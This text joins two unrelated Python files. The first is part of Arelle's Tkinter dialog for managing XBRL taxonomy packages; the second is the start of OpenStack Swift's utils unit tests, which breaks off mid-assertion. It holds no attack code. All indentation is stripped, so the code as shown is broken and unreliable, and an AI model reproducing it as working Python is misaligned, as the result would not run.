time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue?
cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))
class DialogPackageManager(Toplevel):
def __init__(self, mainWin, packageNamesWithNewerFileDates):
super(DialogPackageManager, self).__init__(mainWin.parent)
self.ENABLE = _("Enable")
self.DISABLE = _("Disable")
self.parent = mainWin.parent
self.cntlr = mainWin
# copy plugins for temporary display
self.packagesConfig = PackageManager.packagesConfig
self.packagesConfigChanged = False
self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates
parentGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.parent.geometry())
dialogX = int(parentGeometry.group(3))
dialogY = int(parentGeometry.group(4))
self.title(_("Taxonomy Packages Manager"))
frame = Frame(self)
# left button frame
buttonFrame = Frame(frame, width=40)
buttonFrame.columnconfigure(0, weight=1)
addLabel = Label(buttonFrame, text=_("Find taxonomy packages:"), wraplength=64, justify="center")
addLocalButton = Button(buttonFrame, text=_("Locally"), command=self.findLocally)
ToolTip(addLocalButton, text=_("File chooser allows selecting taxonomy packages to add (or reload), from the local file system. "
"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
addWebButton = Button(buttonFrame, text=_("On Web"), command=self.findOnWeb)
ToolTip(addWebButton, text=_("Dialog to enter URL full path to load (or reload) package, from the web or local file system. "
"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
manifestNameButton = Button(buttonFrame, text=_("Manifest"), command=self.manifestName)
ToolTip(manifestNameButton, text=_("Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). "
"Uses unix file name pattern matching. "
"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). "
"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). "), wraplength=480)
self.manifestNamePattern = ""
addLabel.grid(row=0, column=0, pady=4)
addLocalButton.grid(row=1, column=0, pady=4)
addWebButton.grid(row=2, column=0, pady=4)
manifestNameButton.grid(row=3, column=0, pady=4)
buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)
# right tree frame (packages already known to arelle)
packagesFrame = Frame(frame, width=700)
vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)
hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)
self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)
self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))
self.packagesView.bind('<<TreeviewSelect>>', self.packageSelect)
hScrollbar["command"] = self.packagesView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.packagesView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
packagesFrame.columnconfigure(0, weight=1)
packagesFrame.rowconfigure(0, weight=1)
packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.packagesView.focus_set()
self.packagesView.column("#0", width=120, anchor="w")
self.packagesView.heading("#0", text=_("Name"))
self.packagesView["columns"] = ("ver", "status", "date", "update", "descr")
self.packagesView.column("ver", width=150, anchor="w", stretch=False)
self.packagesView.heading("ver", text=_("Version"))
self.packagesView.column("status", width=50, anchor="w", stretch=False)
self.packagesView.heading("status", text=_("Status"))
self.packagesView.column("date", width=170, anchor="w", stretch=False)
self.packagesView.heading("date", text=_("File Date"))
self.packagesView.column("update", width=50, anchor="w", stretch=False)
self.packagesView.heading("update", text=_("Update"))
self.packagesView.column("descr", width=200, anchor="w", stretch=False)
self.packagesView.heading("descr", text=_("Description"))
remappingsFrame = Frame(frame)
vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)
hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)
self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)
self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))
hScrollbar["command"] = self.remappingsView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.remappingsView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
remappingsFrame.columnconfigure(0, weight=1)
remappingsFrame.rowconfigure(0, weight=1)
remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.remappingsView.focus_set()
self.remappingsView.column("#0", width=200, anchor="w")
self.remappingsView.heading("#0", text=_("Prefix"))
self.remappingsView["columns"] = ("remapping")
self.remappingsView.column("remapping", width=500, anchor="w", stretch=False)
self.remappingsView.heading("remapping", text=_("Remapping"))
# bottom frame package info details
packageInfoFrame = Frame(frame, width=700)
packageInfoFrame.columnconfigure(1, weight=1)
self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify="left",
font=font.Font(family='Helvetica', size=12, weight='bold'))
self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)
self.packageVersionHdr = Label(packageInfoFrame, text=_("version:"), state=DISABLED)
self.packageVersionHdr.grid(row=1, column=0, sticky=W)
self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)
self.packageDescrHdr = Label(packageInfoFrame, text=_("description:"), state=DISABLED)
self.packageDescrHdr.grid(row=2, column=0, sticky=W)
self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)
self.packagePrefixesHdr = Label(packageInfoFrame, text=_("prefixes:"), state=DISABLED)
self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)
self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)
ToolTip(self.packagePrefixesLabel, text=_("List of prefixes that this package remaps."), wraplength=240)
self.packageUrlHdr = Label(packageInfoFrame, text=_("URL:"), state=DISABLED)
self.packageUrlHdr.grid(row=4, column=0, sticky=W)
self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)
ToolTip(self.packageUrlLabel, text=_("URL of taxonomy package (local file path or web loaded file)."), wraplength=240)
self.packageDateHdr = Label(packageInfoFrame, text=_("date:"), state=DISABLED)
self.packageDateHdr.grid(row=5, column=0, sticky=W)
self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)
ToolTip(self.packageDateLabel, text=_("Date of currently loaded package file (with parenthetical node when an update is available)."), wraplength=240)
self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)
ToolTip(self.packageEnableButton, text=_("Enable/disable package."), wraplength=240)
self.packageEnableButton.grid(row=6, column=1, sticky=E)
self.packageMoveUpButton = Button(packageInfoFrame, text=_("Move Up"), state=DISABLED, command=self.packageMoveUp)
ToolTip(self.packageMoveUpButton, text=_("Move package up (above other remappings)."), wraplength=240)
self.packageMoveUpButton.grid(row=6, column=2, sticky=E)
self.packageMoveDownButton = Button(packageInfoFrame, text=_("Move Down"), state=DISABLED, command=self.packageMoveDown)
ToolTip(self.packageMoveDownButton, text=_("Move package down (below other remappings)."), wraplength=240)
self.packageMoveDownButton.grid(row=6, column=3, sticky=E)
self.packageReloadButton = Button(packageInfoFrame, text=_("Reload"), state=DISABLED, command=self.packageReload)
ToolTip(self.packageReloadButton, text=_("Reload/update package."), wraplength=240)
self.packageReloadButton.grid(row=6, column=4, sticky=E)
self.packageRemoveButton = Button(packageInfoFrame, text=_("Remove"), state=DISABLED, command=self.packageRemove)
ToolTip(self.packageRemoveButton, text=_("Remove package from packages table (does not erase the package file)."), wraplength=240)
self.packageRemoveButton.grid(row=6, column=5, sticky=E)
packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)
packageInfoFrame.config(borderwidth=4, relief="groove")
okButton = Button(frame, text=_("Close"), command=self.ok)
ToolTip(okButton, text=_("Accept and changes (if any) and close dialog."), wraplength=240)
cancelButton = Button(frame, text=_("Cancel"), command=self.close)
ToolTip(cancelButton, text=_("Cancel changes (if any) and close dialog."), wraplength=240)
okButton.grid(row=3, column=3, sticky=(S,E), pady=3)
cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)
enableDisableFrame = Frame(frame)
enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)
enableAllButton = Button(enableDisableFrame, text=_("Enable All"), command=self.enableAll)
ToolTip(enableAllButton, text=_("Enable all packages."), wraplength=240)
disableAllButton = Button(enableDisableFrame, text=_("Disable All"), command=self.disableAll)
ToolTip(disableAllButton, text=_("Disable all packages."), wraplength=240)
enableAllButton.grid(row=1, column=1)
disableAllButton.grid(row=1, column=2)
self.loadTreeViews()
self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100))
frame.grid(row=0, column=0, sticky=(N,S,E,W))
frame.columnconfigure(0, weight=0)
frame.columnconfigure(1, weight=1)
frame.rowconfigure(0, weight=1)
window = self.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.close)
self.protocol("WM_DELETE_WINDOW", self.close)
self.grab_set()
self.wait_window(self)
def loadTreeViews(self):
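# Rebuild both treeviews (packages and remappings) from the in-memory
# packagesConfig copy, flag packages with newer files available, then
# clear the detail pane via packageSelect().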
self.selectedModule = None
# clear previous treeview entries
for previousNode in self.packagesView.get_children(""):
self.packagesView.delete(previousNode)
for i, packageInfo in enumerate(self.packagesConfig.get("packages", [])):
name = packageInfo.get("name", "package{}".format(i))
node = self.packagesView.insert("", "end", "_{}".format(i), text=name)
self.packagesView.set(node, "ver", packageInfo.get("version"))
self.packagesView.set(node, "status", packageInfo.get("status"))
self.packagesView.set(node, "date", packageInfo.get("fileDate"))
if name in self.packageNamesWithNewerFileDates:
self.packagesView.set(node, "update", _("available"))
self.packagesView.set(node, "descr", packageInfo.get("description"))
# clear previous treeview entries
for previousNode in self.remappingsView.get_children(""):
self.remappingsView.delete(previousNode)
for i, remappingItem in enumerate(sorted(self.packagesConfig.get("remappings", {}).items())):
prefix, remapping = remappingItem
node = self.remappingsView.insert("", "end", prefix, text=prefix)
self.remappingsView.set(node, "remapping", remapping)
self.packageSelect() # clear out prior selection
def ok(self, event=None):
if self.packagesConfigChanged:
PackageManager.packagesConfig = self.packagesConfig
PackageManager.packagesConfigChanged = True
self.cntlr.onPackageEnablementChanged()
self.close()
def close(self, event=None):
self.parent.focus_set()
self.destroy()
def packageSelect(self, *args):
node = (self.packagesView.selection() or (None,))[0]
try:
nodeIndex = int(node[1:])
except (ValueError, TypeError):
nodeIndex = -1
if 0 <= nodeIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][nodeIndex]
self.selectedPackageIndex = nodeIndex
name = packageInfo["name"]
self.packageNameLabel.config(text=name)
self.packageVersionHdr.config(state=ACTIVE)
self.packageVersionLabel.config(text=packageInfo["version"])
self.packageDescrHdr.config(state=ACTIVE)
self.packageDescrLabel.config(text=packageInfo["description"])
self.packagePrefixesHdr.config(state=ACTIVE)
self.packagePrefixesLabel.config(text=', '.join(packageInfo["remappings"].keys()))
self.packageUrlHdr.config(state=ACTIVE)
self.packageUrlLabel.config(text=packageInfo["URL"])
self.packageDateHdr.config(state=ACTIVE)
self.packageDateLabel.config(text=packageInfo["fileDate"] + " " +
(_("(an update is available)") if name in self.packageNamesWithNewerFileDates else ""))
self.packageEnableButton.config(state=ACTIVE,
text={"enabled":self.DISABLE,
"disabled":self.ENABLE}[packageInfo["status"]])
self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)
self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig["packages"]) - 1) else DISABLED)
self.packageReloadButton.config(state=ACTIVE)
self.packageRemoveButton.config(state=ACTIVE)
else:
self.selectedPackageIndex = -1
self.packageNameLabel.config(text="")
self.packageVersionHdr.config(state=DISABLED)
self.packageVersionLabel.config(text="")
self.packageDescrHdr.config(state=DISABLED)
self.packageDescrLabel.config(text="")
self.packagePrefixesHdr.config(state=DISABLED)
self.packagePrefixesLabel.config(text="")
self.packageUrlHdr.config(state=DISABLED)
self.packageUrlLabel.config(text="")
self.packageDateHdr.config(state=DISABLED)
self.packageDateLabel.config(text="")
self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)
self.packageMoveUpButton.config(state=DISABLED)
self.packageMoveDownButton.config(state=DISABLED)
self.packageReloadButton.config(state=DISABLED)
self.packageRemoveButton.config(state=DISABLED)
def findLocally(self):
initialdir = self.cntlr.pluginDir # default plugin directory
if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory
initialdir = self.cntlr.config.setdefault("packageOpenDir", initialdir)
filename = self.cntlr.uiFileDialog("open",
parent=self,
title=_("Choose taxonomy package file"),
initialdir=initialdir,
filetypes=[(_("Taxonomy package files (*.zip)"), "*.zip"),
(_("PWD Manifest (taxonomyPackage.xml)"), "taxonomyPackage.xml"),
(_("pre-PWD Manifest (*.taxonomyPackage.xml)"), "*.taxonomyPackage.xml"),
(_("pre-PWD Oasis Catalog (*catalog.xml)"), "*catalog.xml")],
defaultextension=".zip")
if filename:
# remember the directory of the chosen package so the next file chooser starts there
self.cntlr.config["packageOpenDir"] = os.path.dirname(filename)
packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)
self.loadFoundPackageInfo(packageInfo, filename)
def findOnWeb(self):
url = DialogURL.askURL(self)
if url: # url is the in-cache or local file
packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)
self.cntlr.showStatus("") # clear web loading status
self.loadFoundPackageInfo(packageInfo, url)
def manifestName(self):
self.manifestNamePattern = simpledialog.askstring(_("Archive manifest file name pattern"),
_("Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \n"
"Uses unix file name pattern matching. \n"
"Multiple manifest files are supported in archive (such as oasis catalogs). \n"
"(If blank, search for either .taxonomyPackage.xml or catalog.xml). "),
initialvalue=self.manifestNamePattern,
parent=self)
def loadFoundPackageInfo(self, packageInfo, url):
if packageInfo and packageInfo.get("name"):
self.addPackageInfo(packageInfo)
self.loadTreeViews()
else:
messagebox.showwarning(_("Package is not itself a taxonomy package. "),
_("File does not itself contain a manifest file: \n\n{0}\n\n "
"If opening an archive file, the manifest file search pattern currently is \"\", please press \"Manifest\" to change manifest file name pattern, e.g.,, \"*.taxonomyPackage.xml\", if needed. ")
.format(url),
parent=self)
def removePackageInfo(self, name, version):
# find package entry
packagesList = self.packagesConfig["packages"]
j = -1
for i, packageInfo in enumerate(packagesList):
if packageInfo['name'] == name and packageInfo['version'] == version:
j = i
break
if 0 <= j < len(packagesList):
del packagesList[j]
self.packagesConfigChanged = True
def addPackageInfo(self, packageInfo):
name = packageInfo["name"]
version = packageInfo["version"]
self.removePackageInfo(name, version) # remove any prior entry for this package
self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available
self.packagesConfig["packages"].append(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.packagesConfigChanged = True
def packageEnable(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
if self.packageEnableButton['text'] == self.ENABLE:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
elif self.packageEnableButton['text'] == self.DISABLE:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveUp(self):
if 1 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex -1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveDown(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]) - 1:
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex + 1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageReload(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
url = packageInfo.get("URL")
if url:
packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get("manifestName"))
if packageInfo:
self.addPackageInfo(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
self.cntlr.showStatus(_("{0} reloaded").format(packageInfo.get("name")), clearAfter=5000)
else:
messagebox.showwarning(_("Package error"),
_("File or package cannot be reloaded: \n\n{0}")
.format(url),
parent=self)
def packageRemove(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
self.removePackageInfo(packageInfo["name"], packageInfo["version"])
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def enableAll(self):
self.enableDisableAll(True)
def disableAll(self):
self.enableDisableAll(False)
def enableDisableAll(self, doEnable):
for iPkg in range(len(self.packagesConfig["packages"])):
packageInfo = self.packagesConfig["packages"][iPkg]
if doEnable:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
else:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import stat
import sys
import json
import math
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import traceback
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout,
ReplicationLockTimeout,
MimeInvalid, ThreadPoolDead)
from swift.common import utils
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.swob import Request, Response, HeaderKeyDict
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
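# MockOs stands in for the os module in these tests: names listed in pass_funcs
# become no-ops, names in called_funcs just record that they were called, and
# names in raise_funcs record the call and raise OSError. Unknown attributes
# fall through to the real os module via __getattr__.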
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# only override portions of the os module; fall back to the real os for the rest
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
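# MockUdpSocket records sendto() payloads for later inspection, or raises a
# socket.error with the configured errno to simulate send failures.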
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
@property
def version_info(self):
return sys.version_info
def reset_loggers():
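# Undo handler installation done by utils.get_logger() so each test starts
# with a clean logging configuration.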
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
# can't have an offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
